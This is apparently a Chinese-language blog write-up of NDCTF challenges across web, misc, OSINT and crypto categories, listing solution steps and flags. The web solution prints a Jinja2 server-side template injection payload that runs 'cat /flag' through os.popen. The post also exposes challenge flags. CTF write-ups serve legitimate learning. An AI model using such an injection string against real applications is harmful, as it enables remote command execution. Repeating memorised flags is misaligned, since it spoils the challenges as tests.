NDCTF-WP
WEB
ezpython
源码找到路由/s3c0nd,进去发现需要fuzz,(直接盲猜114514结果对了),再进去是个ssti,直接打就行
GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}} |

ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088}
MISC
签到
先base64解码,然后去查这个域名的txt记录
dig TXT ctf.ctf.vin |

flag{W3lc0m3_T0_NETDREAMCTF!!!!!}
ezimg
发现图片文件最后有一串base64编码,解码得到一个腾讯文档地址https://docs.qq.com/doc/DZWxobHhmRW9pd09k,上面写flag不在这里,但是刷新页面可以看到在图片加载之前图片下方有一串编码,在页面中全选复制粘贴可以得到以下东西

并非flag |
解码得到https://wwgn.lanzoul.com/i3q4y30huefa,下载源码让ai写个解密脚本得到flag
from cryptography.fernet import Fernet |

flag{Hu@ngD0w_L0v3s_M1sc_F0r3v3r!!!!!}
I_AM_K
import base64 |

flag{I_am_K_hypocritical_K}
OSINT
Bridge
谷歌识图发现和重庆万州的桥相似

去搜一下发现是牌楼长江大桥
flag{牌楼长江大桥}
Where_am_i
这个谷歌直接出

flag{渥太华医院}
PWN
1ezpwn
CRYPTO
EzRSA
ai一把梭
import gmpy2 |

flag{EZ_3Z++==+__U_C@n_F1n1sh_1t}
Quaternion_Lock
同样ai一把梭
import itertools |

flag{0k@y_U_C@n_F1n1sh_iT!!!}
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!